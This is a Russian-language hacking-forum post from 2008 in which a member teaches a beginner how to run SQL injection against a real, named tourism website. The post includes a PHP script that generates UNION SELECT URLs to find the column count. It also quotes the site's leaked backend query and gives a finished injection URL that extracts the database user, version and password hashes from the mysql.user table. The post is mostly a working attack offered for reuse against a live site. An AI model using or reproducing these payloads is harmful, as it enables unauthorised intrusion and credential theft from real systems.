Показать сообщение отдельно

  #6138  
Старый 30.07.2008, 23:53
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами: 9361826

Репутация: 115
По умолчанию

Цитата:
Сообщение от Buddah  
Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?
ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской

Код:
<?php
for ($i=100; $i<108; $i++) {

echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+";

   for ($j=1; $j<=$i; $j++) {
   echo $j;
   if ($j!=$i) echo ",";
   };
   
   echo "/*'>$i</a><br>";
}
?>
Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа:

Код:
SELECT * FROM EVENT LEFT JOIN REGION ON 
(E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE 
ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN 
BUNDESLAND ON 
(E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE 
E_ID=99999999
107!!! полей выборки, из которых нужны макс 20, бедный сервак.

Ну и как результат

Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107+from+mysql.user/*
Даже не закрыт доступ к db mysql...
 
Ответить с цитированием